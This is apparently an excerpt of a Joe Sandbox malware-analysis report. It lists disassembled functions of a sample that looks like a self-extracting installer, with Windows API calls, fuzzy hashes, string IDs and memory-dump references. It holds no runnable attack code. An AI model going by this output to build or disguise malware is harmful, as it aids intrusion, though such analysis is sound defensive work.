                                                                    • Instruction ID: 87364bf851807a9d3783278cfb79ffb10547d227827cc6f6944e766e6ae994b9
                                                                    • Opcode Fuzzy Hash: b54bb7280c56bf500d59ef5ed5a6444fd67b84fc2872fad343f2864c8519ddee
                                                                    • Instruction Fuzzy Hash: 00418F31900108FFCB119FA0DC4CEEF7F79EF49741B008065FA05A61A0D7798A55DB64
                                                                    Function 00408B36 Relevance: 27.1, APIs: 18, Instructions: 144windowcomtimeCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                      • Part of subcall function 004071DA: GetDlgItem.USER32(?,?), ref: 004071E7
                                                                      • Part of subcall function 004071DA: ShowWindow.USER32(00000000,?), ref: 004071FE
                                                                    • GetDlgItem.USER32(?,000004B8), ref: 00408B63
                                                                    • SendMessageW.USER32(00000000,00000401,00000000,75300000), ref: 00408B72
                                                                    • GetDlgItem.USER32(?,000004B5), ref: 00408BB9
                                                                    • GetWindowLongW.USER32(00000000,000000F0), ref: 00408BBE
                                                                    • GetDlgItem.USER32(?,000004B5), ref: 00408BCE
                                                                    • SetWindowLongW.USER32(00000000), ref: 00408BD1
                                                                    • GetSystemMenu.USER32(?,00000000,000004B4,00000000), ref: 00408BF7
                                                                    • EnableMenuItem.USER32(00000000,0000F060,00000001), ref: 00408C09
                                                                    • GetDlgItem.USER32(?,000004B4), ref: 00408C13
                                                                    • SetFocus.USER32(00000000), ref: 00408C16
                                                                    • SetTimer.USER32(?,00000001,00000000,00000000), ref: 00408C45
                                                                    • CoCreateInstance.OLE32(00416E80,00000000,00000001,00416B08,?), ref: 00408C69
                                                                    • GetDlgItem.USER32(?,00000002), ref: 00408C86
                                                                    • IsWindow.USER32(00000000), ref: 00408C89
                                                                    • GetDlgItem.USER32(?,00000002), ref: 00408C99
                                                                    • EnableWindow.USER32(00000000), ref: 00408C9C
                                                                    • GetDlgItem.USER32(?,000004B5), ref: 00408CB0
                                                                    • ShowWindow.USER32(00000000), ref: 00408CB3
                                                                      • Part of subcall function 00407A3B: GetDlgItem.USER32(?,000004B6), ref: 00407A49
                                                                      • Part of subcall function 004086EB: GetModuleHandleW.KERNEL32(00000000,00000065,000004B7,?,?,?,?,?,00408AB5), ref: 00408714
                                                                      • Part of subcall function 004086EB: LoadIconW.USER32(00000000), ref: 00408717
                                                                      • Part of subcall function 004086EB: GetSystemMetrics.USER32(00000032), ref: 0040872B
                                                                      • Part of subcall function 004086EB: GetSystemMetrics.USER32(00000031), ref: 00408730
                                                                      • Part of subcall function 004086EB: GetModuleHandleW.KERNEL32(00000000,00000065,00000001,00000000,?,?,?,?,?,00408AB5), ref: 00408739
                                                                      • Part of subcall function 004086EB: LoadImageW.USER32(00000000), ref: 0040873C
                                                                      • Part of subcall function 004086EB: SendMessageW.USER32(?,00000080,00000001,?), ref: 0040875C
                                                                      • Part of subcall function 004086EB: SendMessageW.USER32(?,00000080,00000000,00000000), ref: 00408765
                                                                      • Part of subcall function 004086EB: GetDlgItem.USER32(?,000004B2), ref: 00408781
                                                                      • Part of subcall function 004086EB: GetDlgItem.USER32(?,000004B2), ref: 0040878B
                                                                      • Part of subcall function 004086EB: GetWindowLongW.USER32(?,000000F0), ref: 00408797
                                                                      • Part of subcall function 004086EB: SetWindowLongW.USER32(?,000000F0,00000000), ref: 004087A6
                                                                      • Part of subcall function 004086EB: GetDlgItem.USER32(?,000004B5), ref: 004087B4
                                                                      • Part of subcall function 004086EB: GetDlgItem.USER32(?,000004B5), ref: 004087C2
                                                                      • Part of subcall function 004086EB: GetWindowLongW.USER32(?,000000F0), ref: 004087CE
                                                                      • Part of subcall function 004086EB: SetWindowLongW.USER32(?,000000F0,00000000), ref: 004087DD
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.4546744746.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000000.00000002.4546705371.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4546775106.0000000000415000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4546802029.0000000000419000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4546839031.000000000041C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_400000_7q551ugrWe.jbxd
                                                                    Similarity
                                                                    • API ID: Item$Window$Long$MessageSendSystem$EnableHandleLoadMenuMetricsModuleShow$CreateFocusIconImageInstanceTimer
                                                                    • String ID:
                                                                    • API String ID: 1057135554-0
                                                                    • Opcode ID: 4c11372e592c7ee729e35fc86577e60408999ac1414f6f050f9cdca6ecb8968b
                                                                    • Instruction ID: 260128caa5a256333788f33680fc13296caa9e9ac1428af8f37f53b95f277c78
                                                                    • Opcode Fuzzy Hash: 4c11372e592c7ee729e35fc86577e60408999ac1414f6f050f9cdca6ecb8968b
                                                                    • Instruction Fuzzy Hash: E1415B71644708EBDA246F26DE49F977BADEB80B54F00853DF555A62E0CF79AC00CA2C
                                                                    Function 004072F5 Relevance: 24.3, APIs: 16, Instructions: 294COMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • GetDlgItem.USER32(?,000004B3), ref: 0040731D
                                                                    • GetWindowLongW.USER32(00000000,000000F0), ref: 00407322
                                                                    • GetDlgItem.USER32(?,000004B4), ref: 00407359
                                                                    • GetWindowLongW.USER32(00000000,000000F0), ref: 0040735E
                                                                    • GetSystemMetrics.USER32(00000010), ref: 004073E0
                                                                    • GetSystemMetrics.USER32(00000011), ref: 004073E6
                                                                    • GetSystemMetrics.USER32(00000008), ref: 004073ED
                                                                    • GetSystemMetrics.USER32(00000007), ref: 004073F4
                                                                    • GetParent.USER32(?), ref: 00407418
                                                                    • GetClientRect.USER32(00000000,?), ref: 0040742A
                                                                    • ClientToScreen.USER32(?,?), ref: 0040743D
                                                                    • SetWindowPos.USER32(?,00000000,?,?,?,00000000,00000004), ref: 004074A3
                                                                    • GetClientRect.USER32(?,?), ref: 0040753D
                                                                      • Part of subcall function 004072C6: GetDlgItem.USER32(?,?), ref: 004072E4
                                                                      • Part of subcall function 004072C6: SetWindowPos.USER32(00000000), ref: 004072EB
                                                                    • ClientToScreen.USER32(?,?), ref: 00407446
                                                                      • Part of subcall function 004071BD: GetDlgItem.USER32(?,?), ref: 004071C9
                                                                    • GetSystemMetrics.USER32(00000008), ref: 004075C2
                                                                    • GetSystemMetrics.USER32(00000007), ref: 004075C9
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.4546744746.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000000.00000002.4546705371.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4546775106.0000000000415000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4546802029.0000000000419000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4546839031.000000000041C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_400000_7q551ugrWe.jbxd
                                                                    Similarity
                                                                    • API ID: MetricsSystem$ClientItemWindow$LongRectScreen$Parent
                                                                    • String ID:
                                                                    • API String ID: 747815384-0
                                                                    • Opcode ID: ae888a572df34d8200fbb5f065eb0fa3bdccac2998dde38db5d0dc60573d1a76
                                                                    • Instruction ID: 27a08476a10642596e4b9d74cae09f61027c0f3cc76a3fdd313218faaf2b79ea
                                                                    • Opcode Fuzzy Hash: ae888a572df34d8200fbb5f065eb0fa3bdccac2998dde38db5d0dc60573d1a76
                                                                    • Instruction Fuzzy Hash: 69A13C71E04609AFDB14CFB9CD85AEEBBF9EB48304F148529E905F3291D778E9008B65
                                                                    Function 0041382F Relevance: 16.6, APIs: 11, Instructions: 111COMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.4546744746.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000000.00000002.4546705371.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4546775106.0000000000415000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4546802029.0000000000419000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4546839031.000000000041C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_400000_7q551ugrWe.jbxd
                                                                    Similarity
                                                                    • API ID: _initterm$FilterHandleInfoModuleStartupXcpt__getmainargs__p__commode__p__fmode__set_app_type__setusermatherrexit
                                                                    • String ID:
                                                                    • API String ID: 801014965-0
                                                                    • Opcode ID: eb2cf8166488941d166303a2e7f1762bb68f066f698331e9c3b40d0cb6435919
                                                                    • Instruction ID: 5122df4da7c12dbd5cee10cc3a7810c6062e66137140a5a107582b8573bb02de
                                                                    • Opcode Fuzzy Hash: eb2cf8166488941d166303a2e7f1762bb68f066f698331e9c3b40d0cb6435919
                                                                    • Instruction Fuzzy Hash: BA415BB1D50744EFDB219FA4D845BEA7BB8EB49711F20412FE44197391C7B84A81CB58
                                                                    Function 00407823 Relevance: 16.6, APIs: 11, Instructions: 87windowCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • GetParent.USER32(?), ref: 00407831
                                                                    • GetWindowLongW.USER32(00000000), ref: 00407838
                                                                    • DefWindowProcW.USER32(?,?,?,?), ref: 0040784E
                                                                    • CallWindowProcW.USER32(?,?,?,?,?), ref: 0040786B
                                                                    • GetSystemMetrics.USER32(00000031), ref: 0040787D
                                                                    • GetSystemMetrics.USER32(00000032), ref: 00407884
                                                                    • GetWindowDC.USER32(?), ref: 00407896
                                                                    • GetWindowRect.USER32(?,?), ref: 004078A3
                                                                    • DrawIconEx.USER32(00000000,?,?,?,?,?,00000000,00000000,00000003), ref: 004078D7
                                                                    • ReleaseDC.USER32(?,00000000), ref: 004078DF
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.4546744746.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000000.00000002.4546705371.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4546775106.0000000000415000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4546802029.0000000000419000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4546839031.000000000041C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_400000_7q551ugrWe.jbxd
                                                                    Similarity
                                                                    • API ID: Window$MetricsProcSystem$CallDrawIconLongParentRectRelease
                                                                    • String ID:
                                                                    • API String ID: 2586545124-0
                                                                    • Opcode ID: 127c443f7cc8da3ca14b37cbf5cd9ef0ee5655b57506046fb41dccdc85244fb6
                                                                    • Instruction ID: 0b69cac6d3a88e426d6ff8758e07239202df165225e4a2dce5f130aa01be730a
                                                                    • Opcode Fuzzy Hash: 127c443f7cc8da3ca14b37cbf5cd9ef0ee5655b57506046fb41dccdc85244fb6
                                                                    • Instruction Fuzzy Hash: E021F97650060AEFCB01AFA8DD48EDF3BA9FB48351F008525F915E6190CB74E910DB65
                                                                    Function 00403BA2 Relevance: 14.1, APIs: 4, Strings: 4, Instructions: 92COMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • ??3@YAXPAX@Z.MSVCRT(?,?,?,00000000,-00000001,;!@InstallEnd@!,;!@Install@!UTF-8!,?,00000000,00000000), ref: 00403BE9
                                                                      • Part of subcall function 00402A0D: ??3@YAXPAX@Z.MSVCRT(?,?,?,?,?,00000000,;!@Install@!UTF-8!,?,00000000,00000000), ref: 00402A80
                                                                    • ??3@YAXPAX@Z.MSVCRT(?,?,?,00000000,-00000001,?,?,00000000,-00000001,;!@InstallEnd@!,;!@Install@!UTF-8!,?,00000000,00000000), ref: 00403C0F
                                                                    • wsprintfA.USER32 ref: 00403C31
                                                                    • wsprintfA.USER32 ref: 00403C5E
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.4546744746.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000000.00000002.4546705371.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4546775106.0000000000415000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4546802029.0000000000419000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4546839031.000000000041C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_400000_7q551ugrWe.jbxd
                                                                    Similarity
                                                                    • API ID: ??3@$wsprintf
                                                                    • String ID: :%hs$:Language:%u$;!@Install@!UTF-8!$;!@InstallEnd@!
                                                                    • API String ID: 2704270482-695273242
                                                                    • Opcode ID: 01de58c80c2895727725e476a1aa16912d604cd70d675cdd3169202dfa8a1add
                                                                    • Instruction ID: 9d93b3f3b108edfb0f00dda14ecc0a1ac1becc65812ee6aaf2e5fef7c6953118
                                                                    • Opcode Fuzzy Hash: 01de58c80c2895727725e476a1aa16912d604cd70d675cdd3169202dfa8a1add
                                                                    • Instruction Fuzzy Hash: 9D21B472B00519ABDB01FAA5CD85EFD73ADAB48704F14802FF504F32C1CB789A068B99
                                                                    Function 00407028 Relevance: 13.5, APIs: 9, Instructions: 47windowCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • GetDlgItem.USER32(?,000004B3), ref: 0040703C
                                                                    • SendMessageW.USER32(00000000,000000F4,00000000,00000001), ref: 0040704F
                                                                    • GetDlgItem.USER32(?,000004B4), ref: 00407059
                                                                    • SendMessageW.USER32(00000000,000000F4,00000000,00000001), ref: 00407061
                                                                    • SendMessageW.USER32(?,00000401,00000000,00000000), ref: 00407071
                                                                    • GetDlgItem.USER32(?,?), ref: 0040707A
                                                                    • SendMessageW.USER32(00000000,000000F4,00000001,00000001), ref: 00407082
                                                                    • GetDlgItem.USER32(?,?), ref: 0040708B
                                                                    • SetFocus.USER32(00000000,?,?,00000000,00407F9B,000004B3,00000000,?,000004B3), ref: 0040708E
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.4546744746.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000000.00000002.4546705371.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4546775106.0000000000415000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4546802029.0000000000419000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4546839031.000000000041C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_400000_7q551ugrWe.jbxd
                                                                    Similarity
                                                                    • API ID: ItemMessageSend$Focus
                                                                    • String ID:
                                                                    • API String ID: 3946207451-0
                                                                    • Opcode ID: 83591c7242e4733216ec8120015317eeb511db45ace1dd7a81700241ea92acb2
                                                                    • Instruction ID: ac3eac6f6a5d23dfb33c6f00e103186fc87c4e398078883204236830092b285c
                                                                    • Opcode Fuzzy Hash: 83591c7242e4733216ec8120015317eeb511db45ace1dd7a81700241ea92acb2
                                                                    • Instruction Fuzzy Hash: 9BF04F72240708BBEA212B61DD86F9BBA5EDF80B54F018425F340650F0CBF3AC109A28
                                                                    Function 00407649 Relevance: 12.3, APIs: 4, Strings: 3, Instructions: 39libraryloaderCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • LoadLibraryA.KERNEL32(uxtheme,?,004089A8,000004B1,00000000,?,?,?,?,?,00408AB5), ref: 00407651
                                                                    • GetProcAddress.KERNEL32(00000000,SetWindowTheme), ref: 00407662
                                                                    • GetWindow.USER32(?,00000005), ref: 0040767B
                                                                    • GetWindow.USER32(00000000,00000002), ref: 00407691
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.4546744746.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000000.00000002.4546705371.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4546775106.0000000000415000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4546802029.0000000000419000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4546839031.000000000041C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_400000_7q551ugrWe.jbxd
                                                                    Similarity
                                                                    • API ID: Window$AddressLibraryLoadProc
                                                                    • String ID: hA$SetWindowTheme$uxtheme
                                                                    • API String ID: 324724604-1539679821
                                                                    • Opcode ID: 80bf877f136b08889d9e5f4a8a5d9d855f6c5cd229e99b8175ebd185f35b86be
                                                                    • Instruction ID: 96ee7b80554ba3a4b118cc962054e33398f60e347ce36d0b88b8db399e3538ac
                                                                    • Opcode Fuzzy Hash: 80bf877f136b08889d9e5f4a8a5d9d855f6c5cd229e99b8175ebd185f35b86be
                                                                    • Instruction Fuzzy Hash: 3FF02772E46F2533C231136A6C48F9B669C9F85B707064536B805F7281DAAAEC0081EC
                                                                    Function 0040769E Relevance: 12.1, APIs: 8, Instructions: 69COMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • memcpy.MSVCRT(?,00419438,00000160), ref: 004076BD
                                                                    • SystemParametersInfoW.USER32(00000029,00000000,?,00000000), ref: 004076DC
                                                                    • GetDC.USER32(00000000), ref: 004076E7
                                                                    • GetDeviceCaps.GDI32(00000000,0000005A), ref: 004076F3
                                                                    • MulDiv.KERNEL32(?,00000048,00000000), ref: 00407702
                                                                    • ReleaseDC.USER32(00000000,?), ref: 00407710
                                                                    • GetModuleHandleW.KERNEL32(00000000), ref: 00407738
                                                                    • DialogBoxIndirectParamW.USER32(00000000,?,?,Function_00006EE0), ref: 0040776D
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.4546744746.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000000.00000002.4546705371.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4546775106.0000000000415000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4546802029.0000000000419000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4546839031.000000000041C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_400000_7q551ugrWe.jbxd
                                                                    Similarity
                                                                    • API ID: CapsDeviceDialogHandleIndirectInfoModuleParamParametersReleaseSystemmemcpy
                                                                    • String ID:
                                                                    • API String ID: 2693764856-0
                                                                    • Opcode ID: f32e2efff65d8c7350818911c104fb39d10c633f79d1afb389a2c80124d65094
                                                                    • Instruction ID: 6b4ef5ea24060658d5863b79bc38f96fa154aaa2e89c1bfb3ba309e5e1f78dd9
                                                                    • Opcode Fuzzy Hash: f32e2efff65d8c7350818911c104fb39d10c633f79d1afb389a2c80124d65094
                                                                    • Instruction Fuzzy Hash: 8021D1B1900618FFD7215BA19C88EEB7B7CFB44741F0000B6FA09A2290D7749E848F69
                                                                    Function 0040720C Relevance: 12.1, APIs: 8, Instructions: 68COMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • GetDC.USER32(?), ref: 0040721C
                                                                    • GetSystemMetrics.USER32(0000000B), ref: 00407238
                                                                    • GetSystemMetrics.USER32(0000003D), ref: 00407241
                                                                    • GetSystemMetrics.USER32(0000003E), ref: 00407249
                                                                    • SelectObject.GDI32(?,?), ref: 00407266
                                                                    • DrawTextW.USER32(?,00000000,000000FF,?,?), ref: 00407281
                                                                    • SelectObject.GDI32(?,?), ref: 004072A7
                                                                    • ReleaseDC.USER32(?,?), ref: 004072B6
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.4546744746.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000000.00000002.4546705371.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4546775106.0000000000415000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4546802029.0000000000419000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4546839031.000000000041C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_400000_7q551ugrWe.jbxd
                                                                    Similarity
                                                                    • API ID: MetricsSystem$ObjectSelect$DrawReleaseText
                                                                    • String ID:
                                                                    • API String ID: 2466489532-0
                                                                    • Opcode ID: 30350efc689a7719ea887eb8f4495072b611486211cb3e9d7370f6f07856f78e
                                                                    • Instruction ID: 0ddf9739e914bca3a0fdf19f43e85ccaed600b4ac583c8006899e124ffc187c2
                                                                    • Opcode Fuzzy Hash: 30350efc689a7719ea887eb8f4495072b611486211cb3e9d7370f6f07856f78e
                                                                    • Instruction Fuzzy Hash: 3C216572900609EFCB018FA5DD44A8EBFF4EF48364F20C4AAE419A72A0C335AA50DF40
                                                                    Function 00408196 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 102windowCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 004081D0
                                                                    • GetDlgItem.USER32(?,000004B8), ref: 004081EE
                                                                    • SendMessageW.USER32(00000000,00000402,00000000,00000000), ref: 00408200
                                                                    • wsprintfW.USER32 ref: 0040821E
                                                                    • ??3@YAXPAX@Z.MSVCRT(?), ref: 004082B6
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.4546744746.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000000.00000002.4546705371.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4546775106.0000000000415000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4546802029.0000000000419000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4546839031.000000000041C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_400000_7q551ugrWe.jbxd
                                                                    Similarity
                                                                    • API ID: ??3@ItemMessageSendUnothrow_t@std@@@__ehfuncinfo$??2@wsprintf
                                                                    • String ID: %d%%
                                                                    • API String ID: 3753976982-1518462796
                                                                    • Opcode ID: feb85234e790cb1b9b57286cee245e86f42689e6b92afad3e333e99d88824fca
                                                                    • Instruction ID: c98f75f04a9c9230d8836c9ffda7361431c24c45b39ddc8f7b463edf0082575f
                                                                    • Opcode Fuzzy Hash: feb85234e790cb1b9b57286cee245e86f42689e6b92afad3e333e99d88824fca
                                                                    • Instruction Fuzzy Hash: F7319171900704FBCB159F60DD45EDA7BB9FF48704F10806EFA46662E1CB75AA11CB68
                                                                    Function 004083AD Relevance: 10.6, APIs: 7, Instructions: 63timethreadinjectionCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • EndDialog.USER32(?,00000000), ref: 004083C7
                                                                    • KillTimer.USER32(?,00000001), ref: 004083D8
                                                                    • SetTimer.USER32(?,00000001,00000000,00000000), ref: 00408402
                                                                    • SuspendThread.KERNEL32(00000298), ref: 0040841B
                                                                    • ResumeThread.KERNEL32(00000298), ref: 00408438
                                                                    • EndDialog.USER32(?,00000000), ref: 0040845A
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.4546744746.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000000.00000002.4546705371.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4546775106.0000000000415000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4546802029.0000000000419000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4546839031.000000000041C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_400000_7q551ugrWe.jbxd
                                                                    Similarity
                                                                    • API ID: DialogThreadTimer$KillResumeSuspend
                                                                    • String ID:
                                                                    • API String ID: 4151135813-0
                                                                    • Opcode ID: 35681ac8209b8d1f5ee70de779bcd553034dbd3016c3fd281c537b84293da185
                                                                    • Instruction ID: a6440e5942dbc82c6b0340cb4ae65663e5addf35b072ffdb2faf6fa56e3ea6cc
                                                                    • Opcode Fuzzy Hash: 35681ac8209b8d1f5ee70de779bcd553034dbd3016c3fd281c537b84293da185
                                                                    • Instruction Fuzzy Hash: 59119171200B09EFD7146F61EE94AAB3BADFB81B49704C03EF996A11A1DB355C10DA6C
                                                                    Function 00404032 Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 56COMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • ??3@YAXPAX@Z.MSVCRT(?,?,?,%%M\,0041572C,?,?,00000000,00404622,?,?,00000000,?,?,00406260,?), ref: 00404078
                                                                    • ??3@YAXPAX@Z.MSVCRT(?,?,?,%%M/,0041571C,?,?,?,%%M\,0041572C,?,?,00000000,00404622,?,?), ref: 004040B6
                                                                    • ??3@YAXPAX@Z.MSVCRT(?,?,?,?,?,?,%%M/,0041571C,?,?,?,%%M\,0041572C,?,?,00000000), ref: 004040DC
                                                                    • ??3@YAXPAX@Z.MSVCRT(?,?,?,?,?,?,?,%%M/,0041571C,?,?,?,%%M\,0041572C,?,?), ref: 004040E4
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.4546744746.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000000.00000002.4546705371.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4546775106.0000000000415000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4546802029.0000000000419000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4546839031.000000000041C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_400000_7q551ugrWe.jbxd
                                                                    Similarity
                                                                    • API ID: ??3@
                                                                    • String ID: %%M/$%%M\
                                                                    • API String ID: 613200358-4143866494
                                                                    • Opcode ID: 0374d482a13ba9aee8c5e10bc5e2984b567f93264fe1f34f69114edc9141db84
                                                                    • Instruction ID: 0aef16b05ee34c363868bff67d8d58263bc671b78327bff7a9d128d2c4d1c409
                                                                    • Opcode Fuzzy Hash: 0374d482a13ba9aee8c5e10bc5e2984b567f93264fe1f34f69114edc9141db84
                                                                    • Instruction Fuzzy Hash: AC11F935C0010AFADF05FFA1D993CED7B39AF10308F50812AB915721E1DB7866899B88
                                                                    Function 00403EBC Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 56COMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • ??3@YAXPAX@Z.MSVCRT(?,?,?,%%T\,0041572C,?,?,00000000,00404622,?,?,00000000,?,?,00406260,?), ref: 00403F02
                                                                    • ??3@YAXPAX@Z.MSVCRT(?,?,?,%%T/,0041571C,?,?,?,%%T\,0041572C,?,?,00000000,00404622,?,?), ref: 00403F40
                                                                    • ??3@YAXPAX@Z.MSVCRT(?,?,?,?,?,?,%%T/,0041571C,?,?,?,%%T\,0041572C,?,?,00000000), ref: 00403F66
                                                                    • ??3@YAXPAX@Z.MSVCRT(?,?,?,?,?,?,?,%%T/,0041571C,?,?,?,%%T\,0041572C,?,?), ref: 00403F6E
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.4546744746.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000000.00000002.4546705371.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4546775106.0000000000415000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4546802029.0000000000419000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4546839031.000000000041C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_400000_7q551ugrWe.jbxd
                                                                    Similarity
                                                                    • API ID: ??3@
                                                                    • String ID: %%T/$%%T\
                                                                    • API String ID: 613200358-2679640699
